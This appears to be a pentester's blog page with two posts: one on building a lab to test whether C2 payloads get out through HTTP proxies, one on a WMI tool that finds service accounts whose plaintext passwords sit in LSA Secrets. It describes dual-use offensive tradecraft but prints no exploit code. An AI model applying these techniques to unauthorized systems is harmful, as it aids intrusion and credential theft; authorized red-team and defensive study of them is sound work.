Saturday, September 21, 2019

Proxy-Aware Payload Testing


TL;DR:


I get told that I am too wordy, so if you want the summary, here are some steps to setup a virtual testing environment to test payloads to see if they can handle HTTP(S) proxies and if so, can they authenticate properly through them as well. This post will cover the proxy setup without authentication since that is the easier part, and I will do a second post shortly to hack together the authentication portion of it.

Skip down to the actual setup here if you wanted to skip the fluff.

Introduction:


There have been times in my red teaming and pentesting experience that I have run into networks where direct outbound traffic to the internet (or in some cases out of the subnet) is completely restricted. When I say direct, I mean that all DNS traffic first goes to an internal DNS server, all web traffic goes through an internal proxy, email to an internal SMTP/IMAP server, etc. From the client workstation to any internet IP address is dropped for TCP, UDP, and ICMP. For the blue teamers reading this post, this is something I highly recommend pushing for in your environment if it is not already the case. This not only allows for better monitoring but also breaks a large amount of commodity malware (and some red team tools) from working. It is one of my favorite incidental preventative controls.

In these cases, we need tools that can communicate out in an indirect manner. The choice of a TCP reverse shell or meterpreter payload are gone. Even default settings for meterpreter HTTP(S) payloads will be blocked since they don’t try to use a proxy by default.

There are times where I might consider C2 over DNS or SMTP, but these can be loud or somewhat complicated respectively. For this purpose, I often look to C2 tools that can use HTTP to communicate and either handle proxies by default or provide configuration options to allow you to set proxy settings for the payload.

I don’t plan to go through all of the C2 tools out there and talk about how they handle or can be made to handle HTTP proxies, but I will quickly highlight some of the different scenarios to show why having an environment test all parts of a proxy connection may be useful to C2 developers and the users of those tools.

Meterpreter:


By default, payload/windows/meterpreter/reverse_http and similar payloads are not proxy aware. These payloads will attempt to go directly to the IP address set for RHOST or resolve the hostname for RHOST then try to go directly to that IP address. Once a connection is established (SYN/ACK), then the traffic sent over that connection will be HTTP.

If traffic for direct outbound connections for your target is blocked, the initial TCP connection will fail and you will not get your shell. Sad day…

All is not lost though if you really want to use meterpreter over HTTP in this environment and you already have gained access to some information. The payload/windows/meterpreter/reverse_http and similar Windows payloads have the following advanced options available:
-       HttpProxyHost
-       HttpProxyPass
-       HttpProxyPort
-       HttpProxyUser


By setting these options, we can get meterpreter to connect out through an internal web proxy. But how do we get this information? We would have to have already compromised a system, phished a user, exposed in code or config files on public sources, or through some other information disclosure. Times where I have used this is for simulating a knowledgeable insider. Metasploit is one of the most popular public “hacking” tools, so to simulate someone who wants to “hack” their own company, I have assumed insider knowledge of their own credentials and the proxy configuration and set those in the payload then used meterpreter to get an external shell. Another situation that I have used has been finding proxy settings in code posted to public GitHub repositories. Developers love to create configuration files that set the proxy settings so that their applications can get out through the proxies like they can.

So, although meterpreter supports proxies and authentication, it does not handle those by default and requires some prior knowledge of the environment to use. I have seen similar results with many C2s that work on Mac OS or Linux such as EmPyre.

Some other tools or payloads currently do not support proxying HTTP payloads. One example would be the meterpreter payloads for Mac OS. The HttpProxy* options metioned for the Windows meterpreter payloads are not accepted by the Mac OS payloads.

PowerShell Empire and Cobalt Strike:


PowerShell Empire and Cobalt Strike work a little bit differently. They use libraries such as .NET’s System.Net.CredentialCache to ask the system to apply the processes current proxy settings and net credentials to the HTTP request. This allows the HTTP connection to be properly proxied the same way the current process would normally proxy web traffic. I continue to say process rather than user, because that can be a pretty important distinction in certain situations. If your process is running as SYSTEM (and you haven’t impersonated a user), then your net credentials will be the credentials of the host computer and not an AD user. Unless the computer accounts are allowed to authenticate through the proxy, this traffic will be denied, and your payload won’t get out. There have been many times where I have used privilege escalations or PSExec to spawn new beacons or agents and struggled to figure out why I wasn’t getting the callbacks. Most of the time, this has been due to being denied at the proxy.

In these situations, there are a few options. Assuming we have already compromised the host, we can do what we did with meterpreter and just hard-code these settings and override the defaults. This way, we have a SYSTEM level shell, but are using a user’s credentials and proxy settings to send traffic out. The other option is to use something like Cobalt Strike’s SMB beacon to create an internal C2 channel and link to those beacons from your HTTP beacon.



How Do We Test This:



How would we test this? Do we need to build a full domain-configured network? Do we need a complex proxy setup? I thought so at first and heavily put this project off but eventually dove in and tried it. What I learned was that just setting up a network with a proxy that didn’t check authentication was extremely easy and served as a good test environment for most of the situations I came across. When I decided that I needed to test authentication as well, things became a bit trickier. I will write a second post on that soon to cover the configuration for that part.

Building the Network:


Note: I was using VMware Fusion for my setup, but the steps should be very similar for something else such as VirtualBox.

For this setup to work, we need to ensure that our test host cannot call directly out to the internet. This could be done with host-based firewalls or IPTables but I decided that I didn’t want to make a bunch of configuration changes on each host that I wanted to test on. I wanted to build a network that I could attach a virtual machine to and it would just work (kind of… I’ll talk about the specifics in the authentication part of the proxy setup).

Here is a diagram of the network we are building:

To accomplish the port restrictions and web proxy, I built two virtual machines:
-       pfSense Firewall
o   Hardware
§  1 core
§  256 MB RAM
§  8 GB Disk (probably excessive)
§  2 network adapters
·      WAN – ‘Share with my Mac’
·      LAN – ‘SimpleProxyNet’ (see below)
o   Software
§  Nothing additional, no addons
-       Ubuntu Server
o   Hardware
§  2 cores
§  1 GB RAM
§  16 GB Disk (again, probably excessive)
§  1 network adapter – ‘SimpleProxyNet’ (see below)
o   Software
§  Added Squid Proxy software

For the networking setup, I created a network in VMware and unchecked the box that allows the network to connect to external networks. I wanted this network to be internal only. This will be the network that I attach my test VM and the proxy to.

Before starting either VM, I attached the network interfaces to the appropriate networks.

Setting Up pfSense:


I am not going to go into too many details on this one but rather include a screenshot of a couple of settings and a couple of tips that I learned along the way. There are many guides for setting up pfSense and I didn’t stray off the beaten path for this. For more info on getting started with pfSense, check out this link: https://www.vgemba.net/vmware/pfSense-VMware-Workstation/.

Some tips:
-       On the LAN interface, I did not set VMware to handle DHCP in anticipation of using pfSense for that purpose.
-       Keeping track of which interface is which can be a little tricky, but usually “Network Adapter” will be em0 or the WAN and “Network Adapter 2” will be em1 or the LAN.
-       Once you add a LAN interface, the management web portal will default to the internal network. I used my victim VM to browse to this management interface once I attached it to the network. You can also use your host OS if you have it also able to communicate on this network.
-       Since pfSense is handling DHCP, I tend to start this VM first and make sure it is fully booted before starting up the proxy or attaching any victim VMs.

Setting Up Squid Proxy:


Before adding any firewall rules, we want to setup our Squid proxy. We do this first because we want to create firewall rules that allow the proxy to call out to the internet, but we don’t want any other hosts on the SimpleProxyNet to be able to do so.

Setting up the Squid proxy without forcing user authentication was actually much easier than I expected, so I am not going to go into too many details on this setup either. I just setup a vanilla Ubuntu Server 18.04 and used apt to install Squid and set a static IP address on the OS (in my case I used 192.168.1.5). I followed a guide all the way up to where they add authentication. A guide such as this could be useful: https://linuxize.com/post/how-to-install-and-configure-squid-proxy-on-ubuntu-18-04/.

Finally, I set up the ACLs to allow the SimpleProxyNet subnet to connect to the proxy and moved on to setting up the firewall rules on the pfSense.

Firewall Rules:


With the proxy and firewall built, we need to connect a system to this network and configure the firewall rules. I created a Windows VM that would serve as my victim and attached it to the SimpleProxyNet network.

To access the pfSense web UI, I used my victim Windows VM by attaching the network interface for my Windows VM to the SimpleProxyNet network and opening a web browser and going to http(s)[:]//[IP of pfSense]/ and logging in with the credentials that I set when first configuring the pfSense (default is admin:pfsense). Once logged in, I went to the firewall settings and configured the LAN settings to allow the IP address of the Squid proxy to communicate outbound on 53/DNS, 80/HTTP, and 443/HTTPS:


These settings prevent the victim VM from being able to connect directly out to the internet as only the Squid proxy traffic is allowed.

Note: The ports from the proxy have been limited to 80, 443, and 53. This is a common situation but not necessarily the way all proxies are setup. In this case, your C2 channels would be limited to calling back on one of these three ports. Some proxies at client environments are allowed out on any port to accommodate web services that run on other ports such as 8080. If you wanted to test in this fashion, you could alter your rules to allow for this and see how your tools work in this situation (proxying SSH can be a fun one if you can figure it out).

Once you have the firewall rules set, your proxy setup, and your victim VM connected, we just need to go to the victim VM and configure it to know about the proxy. Once this is one, we should have an unauthenticated proxied network setup and ready to start testing payloads.


Setting the Proxy Settings on the Victim VM:



For this section, I am only going to go into the setup for modern Windows hosts and not worry about *nix hosts. This is something that is quickly and easily searchable on the internet.

Open the Start Menu and find the Internet Options settings menu. Once opened, go to the Connections tab and click on the LAN settings button. Uncheck the Automatically detect settings checkbox (this is for WPAD, something beyond the scope of this post) and check the Use a proxy server for your LAN checkbox. Enter the IP address of your Squid proxy server (in my case 192.168.1.5) and port (default for Squid is 3128).


Click the OK button on each menu to save the settings. Pop open a web browser and try to browse the internet to confirm that the proxy is working. You should be all setup and ready to test your payloads for proxy-awareness.


Tuesday, August 20, 2019

Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum


TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration.  Info on running the tool is in the bottom section.


Background


On a recent engagement I had gotten local admin privileges on ~20 boxes, and after querying active sessions on them got me nothing interesting I was ready to look for other potential escalation paths.  I ran secretsdump against several of the systems to grab local account hashes, and found that in the process of running it, I had also obtained plaintext credentials for a domain account that was not mentioned in any of the session enumeration information I had pulled.  This got me thinking about how this was possible, as well as how I could more reliably hunt for similar configurations on other systems I could remotely execute code on.

First, to explain what was going on – the NetWkstaUserEnum WINAPI function used by a majority of session enumeration tools is great at what it does, but only pulls data for active sessions on the remote system (interactive, service, and batch logins).  However, if a service is configured on the system but is currently not running, it will not be listed as a current session when enumerating the system.  This makes sense, as a non-running service has no processes associated with it.  After further investigation of the systems in question, I validated this is indeed what happened, as each of the systems was configured with a stopped service that would run using non-default credentials.

I’ve included an example below showing this in practice on a lab system using the GetNetLoggedOnUsers() functionality of @Cobbr_io’s SharpSploit, which uses the NetWkstaUserEnum WINAPI function to query sessions on a remote system, and a test service I configured (TestService) to run as the local ‘admin’ user on the box.  It shows that when the service is not running, the admin user is not enumerated (as expected):



For a bit more context on why this matters to us at all, we have to take a look at how credentials for service accounts are cached by Windows.  When a service is configured with a set of credentials to run as, the OS needs to store them so they don’t have to be re-entered every reboot / every time the service is ran.  Windows stores these service account credentials within the HKEY_LOCAL_MACHINE\Security registry hive, in an encrypted storage space known as LSA Secrets.  However, the passwords themselves, although encrypted, are stored as plaintext values (opposed to NTLM hashes).  Items stored in this space are only readable by NT_Authority/SYSTEM by default, but users with administrative rights on the system can create a backup of the registry hive that can subsequently be accessed and decrypted to extract the data contained within.  As the screengrab below shows, the credentials are sitting in LSA secrets, ready to be used whenever next needed.


And if we dump the contents of LSA secrets, we see we can actually retrieve the plaintext password for the account configured to run the service:


So at this point I was a bit stumped, how could I quickly and reliably enumerate accounts configured to run services on a relatively large number of remote systems?  It’s not really a best practice to start randomly secretsdumping boxes, and even if you threw opsec concerns to the wind it would still take a relatively long amount of time if you wanted to dump anything more than just a few systems.  With that in mind, I wanted something that would ideally be agentless, and could be ran in a multi-threaded process to increase collection speed against multiple systems. I settled on writing something that would check these boxes in c#, primarily as that’s what I’ve been doing the majority of my development in lately.



Building the Tool



Note: This section doesn’t have anything critical on the functionality or usage of the tool, but instead outlines the development process and roadblocks I ran into as I built it.  If this doesn’t interest you, I recommend scrolling through to the next section.

When I first sat down to write this tool, I thought WMI would be a good candidate to use for collection as I had some knowledge of the Win32_Service class and figured it would be pretty easy to pull the needed information from the remote system.  As I prepared to start coding I checked out similar projects that implemented WMI connectivity in .net applications.  From an offensive tooling standpoint, I didn’t find too much outside of tools designed to facilitate code execution, and overwhelmingly they appeared to use the older System.Management namespace to build their WMI objects. In my reading of Microsoft docs, I found that the newer Microsoft.Management.Infrastructure namespace was recommended to use to access WMI.


As I began to build out the functionality of the tool and started exploring other WMI classes I figured it would make sense to extend the tool’s functionality to also include the optional enumeration of sessions on the system via WMI, similar to the sessionEnum functionality seen earlier through SharpSploit.  To explore various WMI classes I used WMI Explorer (https://github.com/vinaypamnani/wmie2/releases) which provides a super helpful interface that allows you to browse WMI classes and get information on specific properties & methods.


Through this I found the  Win32_LoggedOnUser WMI class.  At first it seemed like this would be exactly what was needed for enumerating active sessions, and my initial tests worked great: I log in with user1, user1 shows up when I query the class, I log in with user2, user1 & user2 now show up when I query the class.  The issue came when I logged off with user2 and queried the class again; user2 still showed up as having a session on the system.  I tried giving it a few minutes, thinking that the session was temporarily caching on log-off, but still user2 appeared to be logged in when querying the class.  This led me to a bunch of googling and the unfortunate conclusion that the Win32_LoggedOnUser class tracks ALL login sessions since last reboot, including ‘stale’ connections, or those that are no longer exist.  This isn’t great for us, as these stale sessions do not retain cached credentials in memory by default, potentially leading to a plethora of false positives based on old logins.  There are definitely operational uses for this information, ex. looking for a system where there have been administrative logins at some point since last reboot – likely within the past month – and targeting them for long-term surveillance or persistence with the theory being that an admin may log in there again; however those uses are outside of the scope of this tool.

The array of session objects returned when querying the Win32_LoggedOnUser class have two properties: an antecedent, and a dependent.  The antecedent is the value that contains the ‘human-readable’ information regarding a specific session – the hostname, domain, etc.  The dependent contains a ‘loginID’ value, a unique int corresponding to the specific instance of an account logging into the system.  If a single user logs in & out multiple times prior to a reboot, each instance will receive a unique loginID and thus be tracked independently by the Win32_LoggedOnUser class. 


There wasn’t a whole lot I could do directly with the LoggedOnUser class to filter to only live sessions, but through a bit more exploration of WMI classes I landed on the Win32_SessionProcess class.  Similarly to LoggedOnUser, this class also only returns an antecedent and a dependent.  However, the antecedent and dependent values returned for objects of the SessionProcess class are different, with the antecedent containing the LoginID tied to each active process on the system and the dependent containing a handle to each of these processes.  Although by themselves there isn’t much that can be done with these values, the LoginID returned by SessionProcess can be cross-referenced against the LoginIDs associated with LoggedOnUser objects, giving a listing of actual logins (those that have at least one running process associated with their loginID).


Once this connection had been made, it was fairly straightforward to get session enumeration functionality up and running.  From there, everything was pretty much in its final state as far as functionality goes.  Things were looking good until I started using Wireshark to watch execution across the wire in real-time.  When enumerating sessions using the NetWkstaUserEnum WINAPI function, approximately 15 packets were sent over the wire.  When running session enumeration over WMI, that number was up to ~200 packets.  Quite a bit larger, but makes sense when considering that the session has to be set up and multiple requests have to be made (although if anyone can further update the queries to shave this number further I would be happy to include).  However, when I ran service enumeration, packet counts shot up to a monstrous ~1700 per host.  This was just simply too high for my liking, and I could imagine network congestion, downed boxes, etc. if this was ran over too many hosts in parallel.




The breakthrough in getting the amount of traffic sent over the wire down was the realization that the WQL query sent to retrieve objects was processed server-side.  WMI connectivity using the Microsoft.Management.Infrastructure namespace involves creating a CimSession to a remote host, which in turn is queried using a WQL (WMI-Query-Language) query.  This is a SQL-like statement that can be used to retrieve data based on certain criteria.  I had (mistakenly) assumed that filters applied to these queries (ex. select * from Win32_Service where startname like ‘%admin%’) would be applied to data after it was returned to our system; or in other words all the data would be pulled back across the wire, and then filtered using the given rules prior to displaying.  Luckily, I found this not to be the case, and the entire query is sent to the remote host where it is processed on their system.  From there, only results that match the given filter are sent back over the wire to our system.  Almost all services can be filtered out, as we’re not interested in those running under ‘default’ accounts such as SYSTEM, LOCAL SERVICE, and NETWORK SERVICE. With these new filters applied, traffic for service is down to a much more manageable ~170 packets per host (varies with # services identified).


One other interesting point that became apparent as I analyzed traffic from both WMI and API-based enumeration methods, this method uses solely RPC connections, whereas API methods use SMB to remotely pull information.  There are definitely improvements that can be made to this as well, API methods would likely be faster and may potentially be even lighter from a network traffic perspective (depending on what filtering can be done prior to returning service information), and the current queries could likely be further refined to likewise reduce traffic further. Overall though, with this last hurdle overcome, I figured the tool was in a decent enough place to release. 


wmiServSessEnum Usage


Like other tools that use WMI to connect to other systems, admin rights are required on the remote system.

An IP/ comma-separated list of IPs is required to be entered in on the command line when executing the tool, or a reference to a file on the local system containing one IP per line to target.  I looked into incorporating CIDR notation into the tool, but ultimately decided against it, so as of now only specific IP addresses are supported.  Ideally this shouldn’t be a huge deal as the addresses that are being tested are ones that you already have valid credentials for, meaning initial network enumeration has already occurred.  

By default the tool will use whatever credentials you’re currently running your session as, but also accepts username+domain+plaintext passwords (use a domain of ‘.’ For a local user).

WmiServSessEnum can be ran in several different modes:
·        sessions  – similar to other user enumeration methods, will return a list of active sessions on the remote system
·        services – returns a list (if any) of non-default accounts configured to run services on the remote system
·        all (default) – runs both

flags should be inputted in the format of –u=UserName etc.

When everything works you should get something back that looks like this when running against a remote system: